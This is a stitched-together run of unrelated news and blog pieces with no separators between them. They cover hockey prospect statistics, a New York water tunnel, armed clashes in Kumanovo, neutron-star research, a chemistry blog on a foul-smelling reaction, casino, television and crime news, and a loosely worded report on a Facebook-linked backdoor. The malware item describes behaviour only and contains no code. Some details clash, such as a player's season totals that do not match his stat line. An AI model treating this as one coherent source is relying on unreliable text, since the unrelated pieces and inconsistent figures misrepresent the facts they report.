LW Jason Robertson ( 2nd round/2017 ) had a big week in the Ontario Hockey League recording seven points ( four goals , three assists ) and a plus-five rating in three games for Kingston . Robertson , who has tallied six goals in his past six games , now has 20 points ( 12 goals , eight assists ) in 17 games and is tied for fifth in the OHL in goal scorin
Robertson Stats : Kingston ( OHL ) | 17 GP | 12 G | 8 A | 20 PTS | +4 | 16 PIM
RW Nick Caamano ( 5th round/2016 ) scored one goal in each of his three games with Flint of the OHL over the past week giving him 17 points ( eight goals , nine assists ) in 17 games this season .
Caamano Stats : Flint ( OHL ) | 17 GP | 8 G | 9 A | 17 PTS | -3 | 27 PIM
C Liam Hawel ( 4th round/2017 ) did not record any points in two games for Guelph of the OHL . Hawel has six points ( two goals , four assists ) in 15 games .
Hawel Stats : Guelph ( OHL ) | 15 GP | 2 G | 4 A | 6 PTS | -3 | 4 PIM
D Ondrej Vala ( Free agent/2016 ) picked up one assist in three games for Kamloops of the Western Hockey League giving him nine points ( three goals , six assists ) in 17 games .
Vala Stats : Kamloops ( WHL ) | 17 GP | 3 G | 6 A | 9 PTS | -5 | 20 PIM
C Brett Davis ( 6th round/2017 ) had no points in three games for Kootenay of the WHL . He has ten points ( six goals , four assists ) in 18 games .
Davis Stats : Kootenay | 18 GP | 6 G | 4 A | 10 PTS | -2 | 9 PIM
Europe
D Miro Heiskanen ( 1st round/2017 ) scored two goals in HIFK 's 4-0 win over Vaasan Sport in Finland 's top league on Saturday . Heiskanen now has ten points ( six goals , four assists ) in ten games . Despite missing the first eleven games of the season due to a concussion , Heiskanen is tied for fourth in goal scoring among league defensemen and ranks 12th in points .
Heiskanen Stats : HIFK ( Liiga ) | 10 GP | 6 G | 4 A | 10 PTS | +7 | 6 PIM
LW Valeri Nichushkin ( 1st round/2013 ) tallied two assists in three games for CSKA in the KHL over the past week giving him 16 points ( ten goals , six assists ) in 25 games . Nichushkin ranks fourth on CSKA in scoring .
Nichushkin Stats : CSKA ( KHL ) | 25 GP | 10 G | 6 A | 16 PTS | +7 | 10 PIM
D Jakob Stenqvist ( 6th round/2016 ) scored his first goal of the season in Sweden 's second league , tallying the game-tying goal late in the third period before Bjorkloven fell to Leksands in overtime . Stenqvist has nine points ( one goal , eight assists ) in 15 games and is tied for third in scoring among league defensemen .
Stenqvist Stats : Bjorkloven ( Allsvenskan ) | 15 GP | 1 G | 8 A | 9 PTS | +2 | 4 PIM
D John Nyberg ( 6th round/2014 ) did not pick up any points in two games for Frolunda in the Swedish Hockey League over the past week . Nyberg has four points ( one goal , three assists ) in 16 games and is averaging 18:32 of ice time .
Nyberg Stats : Frolunda ( SHL ) | 16 GP | 1 G | 3 A | 4 PTS | -2 | 24 PIM
LW/C Fredrik Karlstrom ( 3rd round/2016 ) played one game in the Swedish Hockey League this past week and did not score . He also played one game in juniors and tallied a goal . Karlstrom has two points ( one goal , one assist ) in 16 SHL games . He has two goals in three games in juniors .
Karlstrom Stats : Linkoping ( SHL ) | 16 GP | 1 G | 1 A | 2 PTS | -1 | 4 PIM
Linkoping ( Sweden , Jr. ) | 3 GP | 2 G | 0 A | 2 PTS | -3 | 4 PIM
C Jacob Peterson ( 5th round/2017 ) did not score in two junior games this past week . He has 17 points ( seven goals , ten assists ) in 19 games and leads his team in scoring .
Peterson Stats : Frolunda ( Sweden , Jr. ) | 19 GP | 7 G | 10 A | 17 PTS | -7 | 10 PIM
Frolunda ( SHL ) | 2 GP | 0 G | 0 A | 0 PTS | -1 | 0 PIM
G Markus Ruusu ( 6th round/2015 ) played 43 minutes in relief and stopped 12 of 16 shots in Ilves ' 7-3 loss to SaiPa in Finland 's top league last week . Ruusu is 5-6-0 with a 3.75 goals against average and .851 save percentage .
Ruusu Stats : Ilves ( Liiga ) | 5-6-0 | 3.75 | .851
D Miro Karjalainen ( 5th round/2014 ) did not record any points in one game for HPK in Finland 's top league . Karjalainen has three assists in 13 games .
Karjalainen Stats : HPK ( Liiga ) | 13 GP | 0 G |3 A | 3 PTS | -1 | 54 PIM
NCAA
G Jake Oettinger ( 1st round/2017 ) went 1-1-0 over the weekend for Boston University , stopping 31 shots in a 6-0 win over Providence on Friday for his first shutout of the season and then turning away 28 of 32 shots in a 4-1 loss to Northeastern on Saturday . Oettinger is 3-4-1 with a 2.68 goals against average and .913 save percentage .
Oettinger Stats : Boston University ( Hockey East ) | 3-4-1 | 2.68 | .913
D Joe Cecconi ( 5th round/2015 ) picked up one goal and one assist in two games for Michigan over the past week . Cecconi scored a power-play goal in a 7-2 win over Ferris State on Thursday and then picked up a power-play assist in a 3-2 overtime loss to Ferris State on Friday . Cecconi has six points ( one goal , five assists ) in eight games .
Cecconi Stats : Michigan ( Big Ten ) | 8 GP | 1 G | 5 A | 6 PTS | -5 | 10 PIM
LW Riley Tufte ( 1st round/2016 ) picked up one assist in two games as No . 8 Minnesota Duluth lost a pair of games to No . 2 St . Cloud State . Tufte has eight points ( five goals , three assists ) and leads UMD in scoring .
Tufte Stats : Minnesota Duluth ( NCHC ) | 10 GP | 5 G | 3 A | 8 PTS | E | 12 PIM
C/LW Rhett Gardner ( 4th round/2016 ) did not pick up any points as No . 4 North Dakota went 1-0-1 in a weekend series against No . 7 Wisconsin . Gardner has six points ( two goals , four assists ) in ten games .
Gardner Stats : North Dakota ( NCHC ) | 2 GP | 0 G | 2 A | 2 PTS | +1 | 0 PIM
D Michael Prapavessis ( 4th round/2014 ) tallied two power-play assists as RPI and St. Lawrence battled to a 4-4 tie over the weekend . Prapavessis has five assists in eight games .
Prapavessis Stats : RPI ( ECAC ) | 8 GP | 0 G | 5 A | 5 PTS | -1 | 8 PIM
This story was not subject to approval of the National Hockey League or Dallas Stars Hockey Club . Mark Stepneski is an independent writer whose posts on DallasStars.com reflect his own opinions and do not represent official statements from the Dallas Stars . You can follow Mark on Twitter @ StarsInsideEdge .
fullscreen continue view fullscreen close
After more than forty years of construction , Mayor Bloomberg announced the official completion of the Manhattan stretch of Water Tunnel No . 3 , a 13-mile-long tunnel that runs from Hillview Reservoir in Yonkers , south through the Bronx , and into Manhattan , eventually heading on through Roosevelt Island and into Astoria , Queens . Photographer Tod Seelie ventured down into one of the secret Main Valve Chambers 200 feet below the street for an illegal party press conference today , and resurfaced with this sweet infrastructure porn .
$ 4.7 billion well-spent ! The city maintains it 's crucial to have a third water tunnel in case the other two fail or need maintenance , and the massive project—which was first proposed in 1954—provides `` crucial infrastructure redundancy , '' enabling Water Tunnel No . 1 to be taken offline and inspected . THAT tunnel has been carrying water to NYC from upstate reservoirs since 1917 ! Tunnel No . 2 has been in continuous service since 1936 . By the way , here are some more heavy tunnel facts :
Tunnel No . 3 is lined with nearly 3 million cubic feet of concrete .
The new tunnel has claimed the lives of over 24 people in its construction .
The water tunnels sit roughly 500 feet below street level and vary in diameter between 10-24 feet .
82 million cubic feet of soil and rock has been excavated for Tunnel No . 3 so far—enough to fill Madison Square Garden more than 200 times .
The Bloomberg administration dedicated $ 2.7 billion towards the construction of Water Tunnel No . 3 , more than the five previous Mayoral Administrations combined .
`` If there was ever a major failure of water Tunnel No . 1 , the potential for public health and safety consequences in Manhattan could have been really grim , '' the mayor said today . The portion of the tunnel activated by Mayor Bloomberg this afternoon is eight miles long , and since it 's redundant , you wo n't notice it at all ! ( If you want to watch him turn it on now , here 's video . )
The Brooklyn and Queens portion of Tunnel No . 3 's Stage 2 is now the only segment that remains unfinished . Although most of the construction work , including the tunnel 's drilling itself , has been completed , finishing of the network of smaller shafts that will bring water to mains near street level is expected to take until 2021 .
In other breaking water news , the Bloomberg administration also recently completed the $ 1.5 billion Catskill/Delaware Ultraviolet Disinfection Facility , announcing that `` ultraviolet light is a relatively new and revolutionary method for treating drinking water and will provide an added layer of protection against pathogens and other harmful microorganisms for the drinking water consumed by 9 million New Yorkers , including a million residents in upstate counties . '' And later this year , testing and startup will begin on the $ 3.2 billion Croton Water Filtration Plant in the Bronx .
Reporting by Scott Heins
Image copyright AFP Image caption Photos show large-scale destruction in the city as a result of the fighting
Macedonia says five Kosovans led the armed group which was involved in deadly clashes with security forces in the northern town of Kumanovo .
Eight officers and 14 gunmen were killed in the fighting , Interior ministry spokesman Ivo Kotevski said .
Those named were members of the now dismantled Kosovo Liberation Army .
Mr Kotevski said the operation near the Serbian-Kosovan border was now over and the armed group had been `` neutralised '' , with a large amount of weapons seized .
Last month , Macedonian police said about 40 ethnic Albanians from Kosovo briefly took over a police station in the village of Gosince near the border , demanding the creation of an Albanian state within Macedonia .
In 2001 , rebels demanding greater rights for the ethnic Albanian minority launched an uprising against the government , and tensions have continued despite a peace deal .
About a quarter of Macedonia 's two million population are ethnic Albanians .
Men in uniforms
Sami Ukshini , Beg Rizaj , Dem Shehu , Muhamet Krasniqi and Mirsad Ndrecaj were the leaders of the armed group that clashed with police in a suburb of Kumanovo , some 40km ( 25 miles ) north of the capital , Skopje on Saturday , the interior ministry spokesman said .
Only one of the 14 uniformed bodies had been identified - that of another Kosovo national , named Xhafer Zymberi , said the spokesman .
`` More than 30 terrorists , mainly Macedonian nationals and one from Albania , surrendered yesterday [ Saturday ] to the police forces , '' Mr Kotevski added .
He said 37 police officers were also wounded in the clashes .
Residents returning to the city are finding many of their homes damaged as a result of the fighting , one Reuters reporter at the scene says .
`` It 's total destruction . Thank God we 're safe , '' Haki Ukshini said after finding his home largely destroyed .
Image copyright AFP Image caption Bullet-riddled walls greeted residents who returned after fleeing the fighting
Image copyright AFP Image caption Explosions and gunfire rocked Kumanovo throughout the weekend
Image copyright EPA Image caption The operation continued for hours
The men who surrendered would face Macedonian justice , Prime Minister Nikola Gruevski said .
The group had tried to destabilise the country , he said , after paying tribute to the security forces .
His government is already under pressure over claims of illegal wire-tapping and police brutality .
Image copyright AP Image caption Flags were flying at half mast outside the government building in the capital Skopje
Image copyright EPA Image caption Ethnic Albanians pray during the funeral of Isamedin Osmani , one of the police officers killed in the Kumanovo operation
Image copyright Reuters Image caption The Macedonian flag was draped over the coffin of another police officer killed in the attack
The opposition and the government have accused each other of deliberately destabilising the country .
Nato Secretary-General Jens Stoltenberg said he was following the situation with `` great concern '' and urged all sides to `` exercise restraint and avoid any further escalation , in the interest of the country and the whole region '' .
Earlier , the European Commission issued a similar call .
Macedonia , which is a candidate for European Union membership , is observing two days of mourning .
[ /caption ] Imagine an event so catastrophic that it pours more energy out in three hours than the Sun does in a hundred years . Now imagine it a reality . In a study done by Yuri Cavecchi et al . ( 2011 ) , they 've witnessed a neutron star outburst which has put all computer modeling for thermodynamic explosions on extreme objects back to square one .
Apparently a strong magnetic field around accreting pulsar IGR J17480-2446 is the culprit for some areas of the star to ignite in the extreme . X-ray binary IGR J17480-2446 , as a general rule , should be about one and a half times the mass of the Sun confined in an area of about 25km . This creates a strong gravitational field which extracts gas from its orbiting companion . In turn , this collects on the surface of the primary and kindles a fast , high-energy thermonuclear reaction . In a perfect scenario , this reaction would be spread over the surface evenly , but for some reason in about 10 % of case studies some areas burn brighter than others . Just why this happens is a true enigma .
In order to better understand the phenomena , theoretical models were created to test out spin rates . They suggest that rapid rotation stops the burning material from spreading uniformly – much like the Coriolis force develops terrestrial hurricanes . Another hypothesis proposes these conflagrations ride on global-scale waves where one side stays cool and dim as it rises , while the other remains hot and bright . But just which one is viable in the case of this strange pulsar ?
“ We explore the origin of Type I burst oscillations in IGR J17480–2446 and conclude that they are not caused by global modes in the neutron star ocean . We also show that the Coriolis force is not able to confine an oscillation-producing hot-spot on the stellar surface. ” says lead author Yuri Cavecchi ( University of Amsterdam , the Netherlands ) . “ The most likely scenario is that the burst oscillations are produced by a hot-spot confined by hydromagnetic stresses . ”
What makes the astronomers think this way ? One explanation might be the strange properties of J17480 itself . While it obeys the rules when it comes to forming bright patches during thermonuclear events , it breaks them when it comes to spin rates . Why does this particular star only rotate about 10 times per second when the next slowest does it at 245 ? This is where the magnetic field theory comes into play . Perhaps when explosions occur , it 's held in place by this invisible , yet powerful , force .
“ More theoretical work is needed to confirm this , but in the case of J17480 it is a very plausible explanation for our observations ” , says Cavecchi . Co-author Anna Watts further explains their new models – while interesting – might not account for all non-uniform events seen in similar situations . “ The new mechanism may only work in stars like this one , with magnetic fields that are strong enough to stop the flame front from spreading . For other stars with this odd burning behavior , the old models might still apply . ”
Original Information Source : Netherlands Research School for Astronomy . For Further Reading : Implications of burst oscillations from the slowly rotating accreting pulsar IGR 17480-2446 in the globular cluster Terzan 5 .
`` DeMarcus followed me on Twitter this morning and that just changed my whole career , '' joked the newest Kings assistant coach Nancy Lieberman in her nearly 22-minute conversation with Kings TV Play-By-Play and KHTK Sports 1140 Radio Host Grant Napear .
Nancy continued to tell the story of the first time she met Cousins during Summer League in Las Vegas .
`` He put his arm around my shoulder and goes 'are you going to be with us the whole season ? ' and I said 'do you want me to be around all season ? and we kind of looked at each other and he said 'that would be cool ! ' ''
In the highly engaging conversation , Nancy also tells stories of growing up in New York and traveling to play pick-up basketball with kids at Rucker Park , getting to know Rajon Rondo and more .
Listen to the complete interview below !
I would be most surprised if anyone of you had heard of the Willgerodt-Kindler reaction before . It stinks , literally and figuratively . Do n't get me wrong , the reaction works really well , but that is also its actual problem . The desired products are extremely undesired , if you know what I am saying . I have encountered many a badass compound in my days , I am fairly experienced in for instance sulfur-organic and heterocyclic chemistry ( pyrrolidines… mmm… ) , so stuff that smell a little bad is nothing new .
Some compounds smell worse than others , however , and some even worse than that . If you ask me , the Willgerodt-Kindler thioamide products are in this regard numbero uno .
So , what is the Willgerodt-Kindler reaction ? I wish there was a simple answer . Something like this perhaps . If you treat an aldehyde or ketone with elemental sulfur and an amine ( or ammonium sulfide – which according to theory does not even exist ) , you get an amide . Or a thioamide . And as a bonus a migration of the carbonyl zero , one or two positions from where it was before . It is a mess…
Sweet , huh ? How about an arbitrary migration of the carbonyl , and amide products in some cases and a thioamide in other . Try to predict the outcome of these conditions applied on your scaffold . In addition , I believe that these products are a rare example of when the parent compound is responsible for the horrible smell , and not the fact that it might expel hydrogen sulfide or some like that . It is difficult to come to terms with the fact that a very pure solid can smell so bad . In fact , hydrogen sulfide smells like strawberries compared to some of these products .
One of my poor colleagues had to sleep on the couch after working one of these bastards up , even though our skills , facilities and equipment were first-class . Being in the same room as the compound in the day was enough to get him banned from bed in the evening .
The structure of the specific compound that we made then ? It was taken from a paper that is not even available online . ( At least not through the regular channels . ) That is most likely something positive . Anything that makes it less probable that people will repeat its preparation is definitely good . So I will refrain from posting the structure here . If you must know , here is the literature reference :
Z. Naturforsch . 2004 , 59b , 601-605 . ( DOI : not available , abstract here however )
You have been warned . Do not under any circumstances make compound 1 in this publication ( there is your answer ) . It will make you regret becoming a chemist in the first place .
The Westgate Las Vegas will soon have a poker room again . The hotel and casino best known for its sportsbook will open an intimate six-table room on Wednesday , in a space occupied by the former sportsbook “ fan cave . ”
The Westgate most recently closed their poker room in June 2015 , just a week after Paragon Gaming took over casino operations at the Westgate . The hotel itself has changed hands several times over the years , and with it the poker room room has opened and closed multiple times .
According to Poker Room Supervisor David Fried , the possibility of bringing poker back to the Westgate had always been possible , but interest in the most current transformation only recently made it real .
“ [ Management ] really wanted to open this up again , ” Fried said . “ It happened pretty quickly . ”
Fried said the room will mimic the former fan cave and will be hopping just in time for the NFL season .
“ We have the three large projection TVs on one wall and four large flat screens on the other , ” Fried told CardsChat.com . “ I want to get some more TVs on the other side as well . It will be perfect for football season . ”
The proximity of the room , which is located right behind the sportsbook , is also next to a deli , but Fried said table-side dining should be available shortly after the opening .
Soft Opening Wednesday
“ It will be word of mouth at first , ” Fried said of the re-opening . “ But I think people will find out pretty quickly about us . ”
Workers were putting finishing touches on the area on Monday as Fried was shoring up details about games the room will spread . Right now $ 1-2 no-limit , and $ 2-4 and $ 3-6 limit Texas hold'em will be offered , with pot-limit Omaha also an option .
To start , Fried is hoping to offer $ 40 daily tournaments at 11 am and 7 pm .
“ We wanted to have lots of incentives for players , ” Fried said while thinking about high-hand jackpots and other player incentives . “ We 'll start giving away buffets or restaurants credits starting at three hours of play . ”
The Westgate also intends to hold a private tournament next week , an invitational for people in town for the American Poolplayers Association World Championship .
Fourth Time a Charm ?
As an off-Strip venue , the Westgate has seen multiple poker rooms come and go . The property was still the Las Vegas Hilton when it opened a poker room in the 1990s , only to see it shuttered in the early 2000s , just before the poker boom hit .
The hotel opened a new poker room in 2005 , but closed that room in 2007 , at a time when new rooms were still opening up at casinos in Las Vegas and across the world .
Under new management and calling itself the LVH , the hotel would try its hand at poker again in 2013 , only to see interest wane and the doors close in 2015 , this time under the Westgate banner .
The Leopard Man - The most popular videos are a click away
After 20 years of living wild on a remote part of the isle of skye in Scotland , Tom Leppard has retired !
Aged 73 Tom no longer wished to complete his kayak trip on the Kyles of Lochalsh as he was only “ one big wave away from disaster ” .
View Larger Map
He now lives in Broadford , on the Isle Of Skye , which is the 2nd largest town on Skye , in a standard terraced house .
Broadford , Isle of Skye
He used to live in a shack with no running water , no electricity , dirt floors and cooked on a camping stove .
“ I was in the armed forces for 28 years , and I enjoyed the solitary activities , such as parachute jumping , sailing and canoeing . I made the decision 20 years ago that I wanted to escape the city , which I hated , and to live alone in the highlands of Scotland . I have never been lonely since . ”
Strangely enough Tom did n't get a single tattoo whilst in the military service . He changed his name to “ Mr Tom Leppard ” from “ Tom Woodbridge ” and chose to get spots tattooed , not because of any particular interest in cats , but because they were easy for a tattoo artist to do . He earned money from appearances .
“ I would get an income from being the most tattooed man in the world , and would be photographed for the Guinness Book of Records , or featured on TV . I had a spare set of dentures , shaped like fangs , that I 'd put in for the publicity shots . But it was a necessary evil to supplement my income support , or latterly my pension . It 's not something I enjoyed . ”
Tom Leppard , MonkeyReview Salutes you !
Gallo Images/Superstock
Ancient rocks deep in Earth 's crust are producing much more hydrogen gas than previously thought — a situation on a par with conditions near hydrothermal vents , which host thriving ecosystems .
The finding , published on 17 December in Nature1 , provides a road map with which to search for deep microbial life on Earth and possibly Mars .
Scientists once thought that subsurface microbial ecosystems consumed energy that filtered down from Earth 's surface , implying that such ecosystems ultimately depended on sunlight and photosynthesis . But the discovery of deep microbial biomes that feed on chemicals such as hydrogen has raised questions about how widespread these communities are .
Searching for an answer , Barbara Sherwood Lollar , a geoscientist at the University of Toronto , Canada , and her colleagues pulled together data on hydrogen production from more than 200 boreholes at 32 mining sites , mostly in Canada , South Africa and Scandinavia . The researchers used this information to estimate how much hydrogen gas is produced deep in the oldest parts of the continental crust , which could help to identify areas that might host subsurface life .
The team calculates that the oldest rock on Earth — the 550-million- to 4.6-billion-year-old Precambrian continental lithosphere — produces roughly 100 times more gas annually than scientists previously thought . Two chemical reactions produce the gas , including one in which natural radioactivity within the rock splits water molecules into hydrogen and oxygen .
The new estimate effectively doubles the energy available from hydrogen gas dissolved in water in the rock and at deep-sea hydrothermal vents .
“ This massively changes the concept of where life can be on this planet , ” says Sherwood Lollar , because more than 70 % of the rock that forms the continents dates to Precambrian times .
Early life
In 2006 , scientists discovered hydrogen-eating , rock-dwelling microbes living 4 kilometres below the surface of the Witwatersrand basin in South Africa2 . But Sherwood Lollar 's team shows that other sites , including those in Finland and Canada — where she and her colleagues recently identified ancient water more than one billion years old3 — show higher hydrogen-gas levels , suggesting that they may be more hospitable to microbial life .
“ That 's fascinating , ” says Sean McMahon , a geomicrobiologist at Yale University in New Haven , Connecticut . “ The microbiology has n't been done for most of the other boreholes — and it probably should . ”
The finding could help scientists to better understand early life on Earth . One debate centres on how life might have spread and diversified after forming at marine hydrothermal vents , says Emily Catherine Pope , a geochemist at the Natural History Museum of Denmark in Copenhagen .
“ If you identify a source of energy that 's everywhere , it 's no longer a limiting factor for the spread of life , ” she adds .
The new finding could also lead scientists to study areas of Earth that resemble Martian geology by drilling boreholes in cratons , the thick , ancient central cores of the continents . “ You can get a lot deeper before you reach the maximum temperature for life — that 's where you 'd expect to find the deepest living things , ” says McMahon .
BitDefender Announces Identification of Guy Fawkes Virus
Security researchers at BitDefender came across a computer virus claimed to be affiliated by the infamous Anonymous hacktivist group in the Youtube long ago , reported softpedia on November 14 , 2011 .
In a blog by Razvan Livintz , an E-Threats Analyst at BitDefender in the site theinquirer.net on November 14 , 2011 , there were claims of revealing a malware , which was later on came to be known as backdoor-Bifrose-AAJX .
Similar to the Guy Fawkes code , this software was first marked in the beginning of July 2011 , tallying with the statement from Anonymous that the malware could be utilized to create massive havoc at Facebook .
However , as reported by Livintz , on the same day a scam purporting to offer an additional feature in Facebook `` New Facebook Video Chat with Voice Features '' , came up . As Livintz claimed , a click to the link by an ignorant user will lead towards downloading an archive named scan_facebook.zip
As claimed by the hacktivists , the virus , Backdoor-Bifrose-AAJX is sophisticated to take over a compromised system incessantly . Installation of the virus on the computer enables it to harm the system at large by injecting itself in IE process , providing a remote attacker unhindered access to the compromised system , recording keystrokes , and killing several processes of known antimalware solutions , if installed on the computer . Nonetheless , the video forgot to mention the self-replication component as it does connect to a remote server in Egypt instead
An ingeniously designed computer worm is enabled to infect the devices of innumerable social network customers , particularly for those without an appropriate secured anti virus installation on their devises .
As BitDefender speculates , as this threat maintains a low profile and stands nowhere close to the capabilities described by Anonymous , there exists two main credible scenarios .
Thus , it implicates two probabilities . The first signifies that though the virus exists in the social network , it does not spread vulnerabilities as acclaimed and second that there actually exists no such computer worm at all .
However , the plausibility implicates that the experts would further keep a closed monitoring and reviewing of the virus activities further . Though at the same time , it is also recommended that the virus definition database is well maintained and up-to-dated with a strict monitoring on any such harmful maneuverings .
Related article : BitDefender Releases March malware List
» SPAMfighter News - 19-11-2011
When thinking about powerful cameras , most gadget nuts would be happy with a Lumia 1020 or a 5D Mark III , but neither of those can match what 's just left the planet . The European Space Agency has launched the Gaia satellite with a mission to photograph and map the galaxy surrounding us with an unprecedented level of detail and accuracy . Armed with a one billion pixel camerae , the lens can pinpoint a far-away star with an error margin of seven micro-arcseconds , or measure a person 's thumbnail on the moon -- from Earth . The satellite will now travel 1.5 million kilometers away from our home , a which point it 'll begin a five year mission to , you know , explore strange new worlds , seek out new life and new civilizations and boldly photograph where no one has photographed before .
A new trailer for the upcoming season of “ Mob Wives ” promises plenty of drama among the series ' “ OG ” cast when the reality show returns for one last bow on VH1 next month .
Renee Graziano , Karen Gravano , Drita D'Avanzo , Big Ang and Carla Facciolo return for “ Mob Wives : The Last Stand , ” and they 're joined by two new faces : Brittany Fogarty , the daughter of known gangster John Fogarty , and Marissa Jade .
VH1 announced earlier this month that the series , developed from a concept by executive producer Jennifer Graziano of JustJenn Productions , would come to an end after a sixth and final season .
Also read : Remy Ma Takes Stage by Storm in New 'Love & Hip Hop : New York ' Clip ( Video )
“ Mob Wives ” is also produced by Marvin Peart , The Weinstein Company , Electus and Left/Right . Susan Levison , Nina L. Diaz and Daniel Blau Rogge serve as executive producers for VH1 .
“ This six season run has been a journey of exploration for all of the women and I 'm proud to say they have all identified who they are outside of a world that once defined them , ” said Graziano . “ It was my pleasure to work so closely with people I grew up with and called family ( and actual family ) . Not many people are afforded the opportunity to do what they love with people they love . My gratitude to VH1 , The Weinstein Company , Electus , and Left/Right for an amazing show and journey we all took together . Cheers to the future for all ! ”
Also read : VH1 Renews 'Basketball Wives : LA ' for Season 5
“ Mob Wives : The Last Stand ” premieres Wednesday , Jan. 13 at 8 p.m. ET/PT on VH1 .
Story highlights 3 teens accused of fatally shooting Chris Lane , a jogger
Murder charge dropped against James Edwards Jr .
Edwards will testify against the other two defendants
Lane was an Australian who played college baseball
A murder charge was dropped against one of three teenagers accused of fatally shooting a college baseball player in a random `` thrill kill , '' said the district attorney 's office in Stephens County , Oklahoma .
James Edwards Jr. , 17 , will now be tried as a juvenile on a charge of concealing a weapon , reported CNN affiliate KSWO . Edwards will have to testify against former co-defendants Michael Jones and Chancey Luna , who still face charges of first-degree murder .
Police had said the three teens shot Chris Lane -- an Australian attending East Central University on a baseball scholarship -- in August 2013 as he was jogging in Duncan , a town of about 23,000 people located about 80 miles southwest of Oklahoma City .
Authorities had said the three youths saw Lane passing by and shot him because `` they had nothing to do . ''
Jones and Luna have pleaded not guilty .
KSWO reported that no gunshot residue was present on Edwards the day of Lane 's death and that other evidence cast doubt on his involvement in the killing .
In 1917 , at the height of the First World War , an expedition of British soldiers fought their way into Ottoman-controlled Palestine . The British sought to take the region from the Ottomans , an ally of Germany , and had set their sights on capturing Jerusalem . For nine months , the troops waited for orders to advance into the Holy City , setting up camp near the city of Ramla . A new archaeological find suggests that while biding their time there , the soldiers drank . A lot .
As Raf Sanchez reports for the Telegraph , archaeologists digging near Ramla recently discovered a trash pit filled with hundreds of bottles of booze . They found gin bottles , wine bottles , beer bottles , whiskey bottles—all of which seem to have been consumed by British soldiers while they camped in the area .
The excavation of the trash pit unearthed other items , like toothbrushes , uniform buttons and shaving kits . Amidst the refuse , archaeologists found a medallion stamped with the face of King Fuad of Egypt , who ruled the country from 1917 until 1922 . They also discovered the silver tip of a swagger stick , the likes of which were carried by senior officers as a symbol of authority . As Ilan Ben Zion writes in The Times of Israel , the stick was marked with the letters RFC , an acronym for “ Royal Flying Corps. ” In 1918 , the RFC merged with the Royal Naval Air Service to become the Royal Air Force , leading researchers to conclude that the site dates to the 1917 expedition .
For the most part , however , the trash pit consisted of empty bottles of alcohol . “ [ A ] bout 70 percent of the waste that was discarded in the refuse pit were liquor bottles , ” Ron Tueg , excavation director of the Israel Antiquities Authority ( IAA ) , said in a statement . “ It seems that the soldiers took advantage of the respite given them to release the tension by frequently drinking alcohol . ”
The liquor stash was found adjacent to the remnants of an agricultural structure , which was appropriated by the British and turned into a barracks . The building later caught fire and collapsed . In an interview with Sanchez at the Telegraph , Tueg noted that the sheer variety of alcohol found suggests that the building served as an officers ' club .
The booze-guzzling troops were known as the Egypt Expeditionary Force , and they had been sent to the Middle East to protect the Suez Canal from Ottoman attacks . Later , the force advanced into Palestine under the leadership of Field Marshal Edmund Allenby , who re-invigorated Britain 's flailing Middle Eastern campaign .
With Allenby at its helm , the Egypt Expeditionary Force waged a number of successful battles in Palestine . The troops won a decisive victory against the Ottomans at the Battle of Megiddo . Allenby captured Jerusalem in December 1917—and famously collaborated with the charismatic officer T.E . Lawrence , better known as “ Lawrence of Arabia , ” during the process .
The discovery of the trash pit offers insight into a different side of the troops ' time in the Middle East . “ It 's a fascinating testimony of the everyday life of the British military camp a century ago , ” Brigitte Ouahnouna , a researcher at the glass department of the IAA , says in a statement . Their “ everyday life , ” it seems , was pretty boozy .
When a small Australian biotechnology company , Innate Immunotherapeutics , needed a clinical trial for an experimental drug it hoped to turn into a huge moneymaker , the company landed a U.S. partner where it had high-level connections : Roswell Park Cancer Institute in Buffalo , N.Y .
The company is partly owned by Rep. Chris Collins , a wealthy Republican entrepreneur from Buffalo , whose enthusiasm for Innate helped persuade others to invest . Former Rep. Tom Price , now secretary of Health and Human Services , bought Innate stock after Collins told him about it , Price said at his Senate confirmation hearing . Other shareholders include Collins ' campaign supporters , some of whom are key figures in Buffalo 's medical corridor , company and government documents reveal .
Federal money is in play , too : National Cancer Institute funds are being used to test an application for Innate 's drug that could make the company more attractive to potential buyers . Innate has said in presentations to investors that it hopes to sell itself to a major pharma company by the end of 2017 .
The Roswell clinical trial , which could start this month , will investigate whether MIS416 might have an application as an ingredient in a vaccine for ovarian cancer . Innate 's primary strategy , however , is to develop the drug for advanced multiple sclerosis and it has told investors that the results of early-stage human trials in Australia and New Zealand against MS will be reported by this fall .
With its tangled web of medicine , politics and money , Innate 's story has proven irresistible for U.S. news media , whose initial reports in December that Price received discounts on Innate stock purchases helped place the secretary on the hot seat as he won confirmation . Now , the story is exploding half a world away , and the focus is shifting to Collins . The Australian newspaper 's website reported Feb. 6 that a former securities regulator there alleged Collins may have violated disclosure requirements in the country 's securities laws in acquiring his Innate stake and also by not reporting his close relationships with other large shareholders . The Australian government 's Takeovers Panel said Feb. 15 that it has not decided whether to convene a panel to investigate the allegations .
Innate CEO Simon Wilkinson said in a statement that company financial documents “ fully informed ” financial markets about Collins ' investments . The company was “ not in the slightest bit concerned ” about the allegations , which “ are politically motivated and have been peddled by hack journalism , ” he said .
Compared with Price , the potential conflicts could run even deeper for Collins who — along with two children — owns more than 21 percent of Innate 's shares . He is its largest shareholder , company reports show .
Collins , who is ranked by the Center for Responsive Politics as the 14th-wealthiest member of Congress , sits on the health subcommittee of the Energy and Commerce Committee , where he helps oversee health care funding . He was a member of President Donald Trump 's transition team and is a liaison between the new administration and Capitol Hill .
Congressional ethics rules do not prohibit Collins and other members from investing in companies whose businesses overlap with the committees they serve on and the government agencies those committees oversee , legal experts said . Even so , they added , members must take care to disclose possible conflicts of interest because they can erode the public 's trust in government .
“ Members should not have large holdings in health care stocks while serving on committees that oversee health policy , ” said Richard Painter , former chief ethics lawyer for President George W. Bush .
Collins ' spokesman said his boss has done nothing improper .
“ Congressman Collins is not going to apologize because a company he has a relationship with is attempting to help conquer cancer , ” said Collins communications director Michael McAdams . “ It 's sad the media is attempting to launch partisan attacks insinuating otherwise . ”
‘ I Talk About It All The Time '
Collins has been candid about his promotional efforts on Innate 's behalf .
In an interview with CNN , Collins said he often talks to people about Innate . “ I talk about it all the time , just as you would talk about your children , ” he said .
Last month , Collins was overheard by reporters boasting on a cellphone call just off the House floor about the “ many millionaires ” he had made talking up Innate , according to Politico .
Innate 's drug is an immune response stimulator discovered in the 1990s that had initially been developed as a potential treatment for HIV/AIDS or to boost the efficacy of childhood vaccines .
Founded in 2000 , the company later tried MIS416 in a number of medical uses , but never found a marketable niche , Innate 's financial reports and news reports show .
Collins ' ties to Innate go back to 2005 — seven years before he was first elected to Congress — when the successful Buffalo businessman decided to invest after meeting Wilkinson while the CEO was in the U.S. seeking investors , Wilkinson said .
